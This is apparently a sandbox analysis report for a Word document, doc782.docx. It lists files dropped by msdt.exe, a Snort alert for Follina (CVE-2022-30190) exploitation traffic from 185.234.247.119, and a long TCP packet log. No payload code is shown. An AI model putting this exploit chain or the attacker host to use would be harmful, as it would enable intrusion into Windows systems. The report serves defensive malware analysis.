                                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\CL_LocalizationData.psd1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\result\results.xsl

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:Microsoft OOXML
                                                                                                                                                                                            Entropy (8bit):7.869060797789825
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                                            File name:doc782.docx
                                                                                                                                                                                            File size:10144
                                                                                                                                                                                            MD5:e7015438268464cedad98b1544d643ad
                                                                                                                                                                                            SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
                                                                                                                                                                                            SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
                                                                                                                                                                                            SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
                                                                                                                                                                                            SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
                                                                                                                                                                                            TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
                                                                                                                                                                                            File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                            185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)8049171185.234.247.119192.168.2.22

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Jun 7, 2022 19:50:11.678486109 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.706741095 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:11.707032919 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.720185995 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.748521090 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:11.748681068 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:11.868760109 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.900027037 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:12.080867052 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:14.981090069 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.009474993 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.062145948 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.081763029 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.090497017 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.090615988 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.090852022 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.118818998 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119044065 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119088888 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119126081 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119158983 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119165897 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119193077 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119196892 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119206905 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119216919 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119255066 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.351569891 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.383161068 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.383297920 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.592542887 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.620670080 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.620789051 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.701190948 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.729496002 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.765372038 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.793732882 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.807533026 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.836622953 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.836743116 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.843090057 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.871623039 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:15.871742010 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.893604040 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:16.061703920 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:16.090388060 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:16.090501070 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:18.555954933 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:18.584733009 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:50:18.584845066 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:20.797236919 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:20.797388077 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:20.797696114 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:20.825763941 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:23.583709002 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:23.583813906 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.241899014 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.270068884 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.270190001 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.283952951 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.314517975 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452574015 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452677011 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452698946 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452717066 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452734947 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452752113 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452755928 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452764988 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452784061 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452789068 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452800035 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.452855110 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480300903 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480334044 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480350971 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480364084 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480380058 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480396032 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480412006 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480417013 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480441093 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480446100 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480458021 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480494976 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480514050 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480530977 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480539083 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480545998 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480547905 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480560064 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480565071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480583906 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480596066 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480602026 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480616093 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480638027 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480659962 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.484757900 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.484778881 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.485054970 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519479990 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519515991 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519539118 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519562006 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519582987 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519606113 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519614935 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519629002 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519634962 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519649982 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519666910 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519674063 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519696951 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519711018 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519717932 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519741058 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519754887 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519762993 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519784927 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519808054 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519812107 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519829988 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519848108 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519851923 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519874096 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519895077 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519898891 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519917011 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519936085 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519939899 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519962072 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519968033 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.519984961 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520005941 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520034075 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520076036 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520374060 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520438910 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520462036 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520498037 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520514011 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520522118 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520548105 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520555973 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520570040 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520591974 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520601988 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520613909 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520636082 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520642042 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520658970 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520682096 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520688057 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520704985 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520735025 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520747900 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.520802975 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549491882 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549519062 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549537897 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549556017 CEST8049865185.234.247.119192.168.2.5
